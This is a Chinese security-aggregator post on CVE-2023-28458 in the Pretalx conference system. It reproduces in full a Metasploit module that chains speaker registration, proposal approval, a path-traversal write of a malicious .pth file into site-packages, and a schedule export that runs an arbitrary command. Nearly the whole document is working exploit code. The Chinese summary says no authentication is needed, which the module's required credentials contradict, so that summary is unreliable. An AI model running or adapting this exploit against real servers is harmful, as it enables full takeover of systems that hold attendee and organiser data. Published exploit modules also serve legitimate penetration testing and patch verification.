Pretalx Limited File Write to Remote Code Execution

漏洞信息

漏洞名称： Pretalx Limited File Write to Remote Code Execution
漏洞编号：
CVE： CVE-2023-28458
漏洞类型： 命令执行
漏洞等级： 高危
漏洞描述： Pretalx是一个开源的会议管理和调度系统，广泛用于各种会议和活动的组织。它提供了一个完整的解决方案，包括提交管理、日程安排和演讲者管理等功能。由于其灵活性和易用性，Pretalx在学术会议、技术研讨会等场合中被广泛使用。该漏洞存在于Pretalx的文件上传功能中，攻击者可以通过构造特殊的请求，利用文件上传功能实现任意文件写入，进而导致远程代码执行。漏洞的技术根源在于Pretalx对用户上传的文件内容缺乏严格的验证和过滤，使得攻击者可以上传恶意文件并执行任意代码。此漏洞的利用不需要用户认证，攻击者可以直接通过网络发起攻击，对系统安全构成严重威胁。成功利用此漏洞的攻击者可以完全控制受影响的系统，执行任意命令，访问敏感数据，甚至利用该系统作为跳板攻击内网其他设备。因此，该漏洞被评定为高危漏洞，建议所有使用Pretalx的用户尽快升级到最新版本以避免潜在的安全风险。
产品厂商： Pretalx
产品名称： Pretalx
影响版本： version <= 2.3.1
来源： https://github.com/rapid7/metasploit-framework/blob/a77a8ba96f0d5396b129ed2f187eab1a8f2b1480/modules%2Fexploits%2Flinux%2Fhttp%2Fpretalx_rce_cve_2023_28458.rb
类型： rapid7/metasploit-framework:github issues
POC详情


##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html

  include Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Pretalx Limited File Write to Remote Code Execution',
        'Description' => %q{
          This exploit module illustrates how a vulnerability could be exploited
          in an TCP server that has a parsing bug.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Stefan Schiller', # security researcher
          'msutovsky-r7' # module dev
        ],
        'References' => [
          [ 'URL', 'https://www.sonarsource.com/blog/pretalx-vulnerabilities-how-to-get-accepted-at-every-conference/'],
          [ 'CVE', '2023-28458']
        ],
        'Platform' => ['unix', 'linux'],
        'Arch' => ARCH_CMD,
        'Targets' => [

          [
            'All',
            {}
          ]
        ],
        'DefaultOptions' => { 'WfsDelay' => 60 * 5 },
        'DisclosureDate' => '2023-03-07',
        'DefaultTarget' => 0,

        'Notes' => {
          'Stability' => [],
          'Reliability' => [],
          'SideEffects' => []
        }
      )
    )

    register_options([
      OptString.new('USERNAME', [true, 'Username to Pretalx backend', '']),
      OptString.new('PASSWORD', [true, 'Password to Pretalx backend', '']),
      OptString.new('CONFERENCE_NAME', [true, 'Name of conference on behalf which file read will be performed', '']),
      OptString.new('MEDIA_URL', [true, 'Prepend path to file path that allows arbitrary read', '/media']),
      OptString.new('PYTHON_VERSION', [true, 'Python version running on target machine', 'python3.8'])
    ])
  end

  def login
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri('orga', 'login/'),
      'keep_cookies' => true
    })

    fail_with Failure::NotVulnerable, 'Application might not be Pretalx' unless res&.code == 200

    csrf_token = res.get_hidden_inputs.dig(0, 'csrfmiddlewaretoken')

    fail_with Failure::UnexpectedReply, 'Could not find CSRF token' unless csrf_token

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri('orga', 'login/'),
      'vars_post' => { 'csrfmiddlewaretoken' => csrf_token, 'login_email' => datastore['USERNAME'], 'login_password' => datastore['PASSWORD'] },
      'keep_cookies' => true
    })

    fail_with Failure::UnexpectedReply unless res.get_cookies =~ /pretalx_csrftoken=([a-zA-Z0-9]+);/

    @pretalx_token = Regexp.last_match(1)

    return false unless res&.code == 302

    true
  end

  def approve_proposal
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri('orga', 'event', datastore['CONFERENCE_NAME'], 'submissions/')
    })

    fail_with Failure::UnexpectedReply unless res&.code == 200

    html = res.get_html_document

    proposal_element = html.xpath('//td/a').find { |link| link.text.strip == @proposal_name }

    proposal_uri = proposal_element['href']

    fail_with Failure::PayloadFailed unless proposal_uri =~ %r{/orga/event/#{datastore['CONFERENCE_NAME']}/submissions/([a-zA-Z0-9]+)/}

    @proposal_id = Regexp.last_match(1)

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(proposal_uri)
    })

    fail_with Failure::UnexpectedReply unless res&.code == 200

    html = res.get_html_document

    approval_link = html.at('a[@class="dropdown-item submission-state-accepted"]')

    approval_uri = approval_link['href']

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(approval_uri)
    })

    fail_with Failure::UnexpectedReply unless res&.code == 200

    next_token = res.get_hidden_inputs.dig(0, 'next')
    csrf_token = res.get_hidden_inputs.dig(0, 'csrfmiddlewaretoken')

    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(approval_uri),
      'vars_post' => { 'csrfmiddlewaretoken' => csrf_token, 'next' => next_token }
    })

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(datastore['CONFERENCE_NAME'], 'me', 'submissions', @proposal_id, 'confirm')
    })

    fail_with Failure::UnexpectedReply unless res&.code == 200

    csrf_token = res.get_hidden_inputs.dig(0, 'csrfmiddlewaretoken')

    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(datastore['CONFERENCE_NAME'], 'me', 'submissions', @proposal_id, 'confirm'),
      'vars_post' => { 'csrfmiddlewaretoken' => csrf_token }
    })
  end

  def add_proposal_to_schedule
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri('orga', 'event', datastore['CONFERENCE_NAME'], 'schedule', 'api', 'talks/')
    })

    fail_with Failure::UnexpectedReply unless res&.code == 200

    json_data = res.get_json_document

    proposal = json_data['results'].find { |l| l['title'] == @proposal_name }

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri('api', 'events', datastore['CONFERENCE_NAME'], 'rooms/')
    })

    fail_with Failure::UnexpectedReply unless res&.code == 200
    rooms_json = res.get_json_document
    rooms_json['results'].each do |value|
      res = send_request_cgi!({
        'method' => 'GET',
        'uri' => normalize_uri('orga', 'event', datastore['CONFERENCE_NAME'], 'schedule', 'api', 'availabilities', proposal['id'], value['id'])
      })
      next unless res&.code == 200

      availability_json = res.get_json_document

      availability_json['results'].each do |timeslot|
        schedule_slot = { 'room' => (value['id']).to_s, 'start' => timeslot['start'], 'duration' => 30, 'description' => '' }

        res = send_request_cgi({
          'method' => 'PATCH',
          'uri' => normalize_uri('orga', 'event', datastore['CONFERENCE_NAME'], 'schedule', 'api', 'talks', "#{proposal['id']}/"),
          'data' => JSON.generate(schedule_slot),
          'headers' => { 'X-CSRFToken' => @pretalx_token }
        })
        return true if res&.code == 200
      end
    end
    false
  end

  def release_schedule
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri('orga', 'event', datastore['CONFERENCE_NAME'], 'schedule', 'release')
    })

    csrf_token = res.get_hidden_inputs.dig(0, 'csrfmiddlewaretoken')
    html = res.get_html_document
    version = html.at('input[@id="id_version"]')['value']

    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri('orga', 'event', datastore['CONFERENCE_NAME'], 'schedule', 'release'),
      'vars_post' => { 'csrfmiddlewaretoken' => csrf_token, 'version' => version, 'comment_0' => '', 'notify_speakers' => 'off' }
    })
  end

  def register_malicious_speaker
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(datastore['CONFERENCE_NAME'], 'submit/')
    })

    fail_with Failure::UnexpectedReply unless res&.code == 302
    submit_uri = res.headers.fetch('Location', nil)

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(submit_uri),
      'keep_cookies' => true
    })

    fail_with Failure::UnexpectedReply unless res&.code == 200

    csrf_token = res.get_hidden_inputs.dig(0, 'csrfmiddlewaretoken')
    submission_type = res.get_hidden_inputs.dig(0, 'submission_type')
    res.get_hidden_inputs.dig(0, 'content_locale')

    fail_with Failure::Unknown unless submit_uri && csrf_token

    @proposal_name = Rex::Text.rand_text_alphanumeric(10)

    boundary = Rex::Text.rand_text_alphanumeric(16).to_s
    data_post = "------WebKitFormBoundary#{boundary}\r\n"

    data_post << "Content-Disposition: form-data; name=\"csrfmiddlewaretoken\"\r\n\r\n"
    data_post << "#{csrf_token}\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    data_post << "Content-Disposition: form-data; name=\"title\"\r\n\r\n"
    data_post << "#{@proposal_name}\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    data_post << "Content-Disposition: form-data; name=\"submission_type\"\r\n\r\n"
    data_post << "#{submission_type}\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    data_post << "Content-Disposition: form-data; name=\"content_locale\"\r\n\r\n"
    data_post << "en\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    data_post << "Content-Disposition: form-data; name=\"abstract\"\r\n\r\n"
    data_post << %(#{Rex::Text.rand_text_alphanumeric(10)}\r\n)
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    data_post << "Content-Disposition: form-data; name=\"description\"\r\n\r\n"
    data_post << "\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    data_post << "Content-Disposition: form-data; name=\"notes\"\r\n\r\n"
    data_post << "\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    data_post << "Content-Disposition: form-data; name=\"image\";filename=\"\"\r\n"
    data_post << "Content-Type: application/octet-stream\r\n\r\n"
    data_post << "\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    data_post << "Content-Disposition: form-data; name=\"additional_speaker\"\r\n\r\n"
    data_post << "\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(submit_uri),
      'data' => data_post,
      'ctype' => "multipart/form-data; boundary=----WebKitFormBoundary#{boundary}"
    })

    #===============================================================================

    fail_with Failure::UnexpectedReply unless res&.code == 302

    submit_uri = res.headers.fetch('Location', nil)
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(submit_uri),
      'keep_cookies' => true
    })

    fail_with Failure::UnexpectedReply unless res&.code == 200

    csrf_token = res.get_hidden_inputs.dig(0, 'csrfmiddlewaretoken')

    fail_with Failure::Unknown unless submit_uri && csrf_token

    boundary = Rex::Text.rand_text_alphanumeric(16).to_s

    data_post = "------WebKitFormBoundary#{boundary}\r\n"
    data_post << "Content-Disposition: form-data; name=\"csrfmiddlewaretoken\"\r\n\r\n"
    data_post << "#{csrf_token}\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"
    data_post << "Content-Disposition: form-data; name=\"csrfmiddlewaretoken\"\r\n\r\n"
    data_post << "#{csrf_token}\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    data_post << "Content-Disposition: form-data; name=\"login_email\"\r\n\r\n"
    data_post << "#{datastore['USERNAME']}\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    data_post << "Content-Disposition: form-data; name=\"login_password\"\r\n\r\n"
    data_post << "#{datastore['PASSWORD']}\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    data_post << "Content-Disposition: form-data; name=\"register_name\"\r\n\r\n"
    data_post << "\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    data_post << "Content-Disposition: form-data; name=\"register_email\"\r\n\r\n"
    data_post << "\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    data_post << "Content-Disposition: form-data; name=\"register_password\"\r\n\r\n"
    data_post << "\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    data_post << "Content-Disposition: form-data; name=\"register_password_repeat\"\r\n\r\n"
    data_post << "\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"
    #================================================================================

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(submit_uri),
      'data' => data_post,
      'ctype' => "multipart/form-data; boundary=----WebKitFormBoundary#{boundary}"
    })

    fail_with Failure::UnexpectedReply unless res&.code == 302

    submit_uri = res.headers.fetch('Location', nil)
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(submit_uri),
      'keep_cookies' => true
    })

    fail_with Failure::UnexpectedReply unless res&.code == 200

    csrf_token = res.get_hidden_inputs.dig(0, 'csrfmiddlewaretoken')

    fail_with Failure::Unknown unless submit_uri && csrf_token

    boundary = Rex::Text.rand_text_alphanumeric(16).to_s

    data_post = "------WebKitFormBoundary#{boundary}\r\n"
    data_post << "Content-Disposition: form-data; name=\"csrfmiddlewaretoken\"\r\n\r\n"
    data_post << "#{csrf_token}\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    data_post << "Content-Disposition: form-data; name=\"avatar\";filename=\"\"\r\n"
    data_post << "Content-Type: application/octet-stream\r\n\r\n"
    data_post << "\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    data_post << "Content-Disposition: form-data; name=\"name\"\r\n\r\n"
    data_post << "#{Rex::Text.rand_text_alphanumeric(10)}\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    data_post << "Content-Disposition: form-data; name=\"biography\"\r\n\r\n"
    data_post << "#{Rex::Text.rand_text_alphanumeric(10)}\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    data_post << "Content-Disposition: form-data; name=\"availabilities\"\r\n\r\n"
    data_post << %({"availabilities":[]}\r\n)
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    #=============================================================================

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(submit_uri),
      'data' => data_post,
      'ctype' => "multipart/form-data; boundary=----WebKitFormBoundary#{boundary}"
    })

    fail_with Failure::UnexpectedReply unless res&.code == 302
  end

  def get_submission_edit
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(datastore['CONFERENCE_NAME'], 'me', 'submissions', "#{@proposal_id}/")
    })

    fail_with Failure::UnexpectedReply unless res&.code == 200
    res
  end

  def add_resource
    res = get_submission_edit
    hidden_inputs = res.get_hidden_inputs
    html = res.get_html_document

    csrf_token = hidden_inputs.dig(0, 'csrfmiddlewaretoken')
    submission_type = html.at("select[@name='submission_type']//option[@selected]")['value']
    content_locale = hidden_inputs.dig(0, 'content_locale')
    res_initial_forms = hidden_inputs.dig(0, 'resource-INITIAL_FORMS')
    res_min_num_forms = hidden_inputs.dig(0, 'resource-MIN_NUM_FORMS')
    res_max_num_forms = hidden_inputs.dig(0, 'resource-MAX_NUM_FORMS')

    boundary = Rex::Text.rand_text_alphanumeric(16).to_s

    data_post = "------WebKitFormBoundary#{boundary}\r\n"
    data_post << "Content-Disposition: form-data; name=\"csrfmiddlewaretoken\"\r\n\r\n"
    data_post << "#{csrf_token}\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    data_post << "Content-Disposition: form-data; name=\"title\"\r\n\r\n"
    data_post << "#{@proposal_name}\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    data_post << "Content-Disposition: form-data; name=\"submission_type\"\r\n\r\n"
    data_post << "#{submission_type}\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    data_post << "Content-Disposition: form-data; name=\"content_locale\"\r\n\r\n"
    data_post << "#{content_locale}\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    data_post << "Content-Disposition: form-data; name=\"abstract\"\r\n\r\n"
    data_post << "#{Rex::Text.rand_text_alphanumeric(16)}\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    data_post << "Content-Disposition: form-data; name=\"description\"\r\n\r\n"
    data_post << "#{Rex::Text.rand_text_alphanumeric(16)}\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    data_post << "Content-Disposition: form-data; name=\"notes\"\r\n\r\n"
    data_post << "#{Rex::Text.rand_text_alphanumeric(16)}\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    data_post << "Content-Disposition: form-data; name=\"image\"; filename=\"\"\r\n"
    data_post << "Content-Type: application/octet-stream\r\n\r\n"
    data_post << "\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    data_post << "Content-Disposition: form-data; name=\"resource-TOTAL_FORMS\"\r\n\r\n"
    data_post << "1\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    data_post << "Content-Disposition: form-data; name=\"resource-INITIAL_FORMS\"\r\n\r\n"
    data_post << "#{res_initial_forms}\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    data_post << "Content-Disposition: form-data; name=\"resource-MIN_NUM_FORMS\"\r\n\r\n"
    data_post << "#{res_min_num_forms}\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    data_post << "Content-Disposition: form-data; name=\"resource-MAX_NUM_FORMS\"\r\n\r\n"
    data_post << "#{res_max_num_forms}\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    data_post << "Content-Disposition: form-data; name=\"resource-0-id\"\r\n\r\n"
    data_post << "\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    data_post << "Content-Disposition: form-data; name=\"resource-0-description\"\r\n\r\n"
    data_post << "#{Rex::Text.rand_text_alphanumeric(4)}\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    resource_name = Rex::Text.rand_text_alphanumeric(5)

    data_post << "Content-Disposition: form-data; name=\"resource-0-resource\"; filename=\"#{resource_name}.pth\"\r\n"
    data_post << "Content-Type: application/octet-stream\r\n\r\n"
    data_post << %<import os;os.system("#{payload.encoded}")\r\n>
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    res = send_request_cgi!({
      'method' => 'POST',
      'uri' => normalize_uri(datastore['CONFERENCE_NAME'], 'me', 'submissions', "#{@proposal_id}/"),
      'data' => data_post,
      'ctype' => "multipart/form-data; boundary=----WebKitFormBoundary#{boundary}"
    })

    fail_with Failure::PayloadFailed unless res.body =~ /#{resource_name}_([a-zA-Z0-9]+)\.pth/

    @full_resource_name = "#{resource_name}_#{Regexp.last_match(1)}.pth"
  end

  def add_write_primitive
    res = get_submission_edit
    hidden_inputs = res.get_hidden_inputs
    html = res.get_html_document

    csrf_token = hidden_inputs.dig(0, 'csrfmiddlewaretoken')
    submission_type = html.at("select[@name='submission_type']//option[@selected]")['value']
    content_locale = hidden_inputs.dig(0, 'content_locale')

    boundary = Rex::Text.rand_text_alphanumeric(16).to_s

    data_post = "------WebKitFormBoundary#{boundary}\r\n"
    data_post << "Content-Disposition: form-data; name=\"csrfmiddlewaretoken\"\r\n\r\n"
    data_post << "#{csrf_token}\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    data_post << "Content-Disposition: form-data; name=\"title\"\r\n\r\n"
    data_post << "#{@proposal_name}\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    data_post << "Content-Disposition: form-data; name=\"submission_type\"\r\n\r\n"
    data_post << "#{submission_type}\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    data_post << "Content-Disposition: form-data; name=\"content_locale\"\r\n\r\n"
    data_post << "#{content_locale}\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    data_post << "Content-Disposition: form-data; name=\"abstract\"\r\n\r\n"
    data_post << "#{Rex::Text.rand_text_alphanumeric(16)}\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    data_post << "Content-Disposition: form-data; name=\"description\"\r\n\r\n"
    data_post << "<img src='%2fmedia%2f#{datastore['CONFERENCE_NAME']}%2fsubmissions%2f#{@proposal_id}%2fresources/../../../../../media%2f#{datastore['CONFERENCE_NAME']}/../../pretalx/.local/lib/#{datastore['PYTHON_VERSION']}/site-packages/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fmedia%2f#{datastore['CONFERENCE_NAME']}%2fsubmissions%2f#{@proposal_id}%2fresources%2f#{@full_resource_name}'/>\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    data_post << "Content-Disposition: form-data; name=\"notes\"\r\n\r\n"
    data_post << "#{Rex::Text.rand_text_alphanumeric(16)}\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    data_post << "Content-Disposition: form-data; name=\"image\"; filename=\"\"\r\n"
    data_post << "Content-Type: application/octet-stream\r\n\r\n"
    data_post << "\r\n"
    data_post << "------WebKitFormBoundary#{boundary}\r\n"

    send_request_cgi!({
      'method' => 'POST',
      'uri' => normalize_uri(datastore['CONFERENCE_NAME'], 'me', 'submissions', "#{@proposal_id}/"),
      'data' => data_post,
      'ctype' => "multipart/form-data; boundary=----WebKitFormBoundary#{boundary}"
    })
  end

  def trigger_payload
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri('orga', 'event', datastore['CONFERENCE_NAME'], 'schedule', 'export/')
    })

    fail_with Failure::UnexpectedReply unless res&.code == 200

    csrf_token = res.get_hidden_inputs.dig(0, 'csrfmiddlewaretoken')

    res = send_request_cgi!({
      'method' => 'POST',
      'uri' => normalize_uri('orga', 'event', datastore['CONFERENCE_NAME'], 'schedule', 'export', 'trigger'),
      'vars_post' => { 'csrfmiddlewaretoken' => csrf_token }
    })

    fail_with Failure::UnexpectedReply unless res&.code == 200
  end

  def check
    return Exploit::CheckCode::Unknown, 'Login failed, please check credentials' unless login

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri('orga', 'event/'),
      'keep_cookies' => true
    })

    return Exploit::CheckCode::Detected unless res&.code == 200

    html = res.get_html_document

    version_element = Rex::Version.new(html.at('span//a')&.text)

    return Exploit::CheckCode::Appears("Detected vulnerable version #{version_element}") if version_element <= Rex::Version.new('2.3.1')

    Exploit::CheckCode::Safe("Detected version #{version_element} is not vulnerable")
  end

  def exploit
    vprint_status('Registering malicious speaker and proposal')
    register_malicious_speaker

    cookie_jar.clear
    vprint_status('Logging into application')
    fail_with Failure::NoAccess, 'Incorrect credentials' unless login
    vprint_status('Approving proposal')
    approve_proposal

    vprint_status('Uploading resource with payload')
    add_resource
    vprint_status('Inserts write primitve')
    add_write_primitive

    vprint_status('Adding proposal to schedule')
    add_proposal_to_schedule
    vprint_status('Releasing schedule')
    release_schedule

    vprint_status('Exporting schedule')
    trigger_payload
    vprint_status('Waiting for cron to run Python under Pretalx user')
  end
end
Github Poc
#rapid7/metasploit-framework:github issues #命令执行
Pretalx Limited File Write to Remote Code Execution
http://example.com/2025/08/01/github_128799625/
作者
lianccc
发布于
2025年8月1日
许可协议
Gandia Integra Total Authenticated SQL Injection Vulnerability 上一篇
Insecure permissions in LangChain-ChatGLM-Webui commit ef829 allows attackers to arbitrarily view 下一篇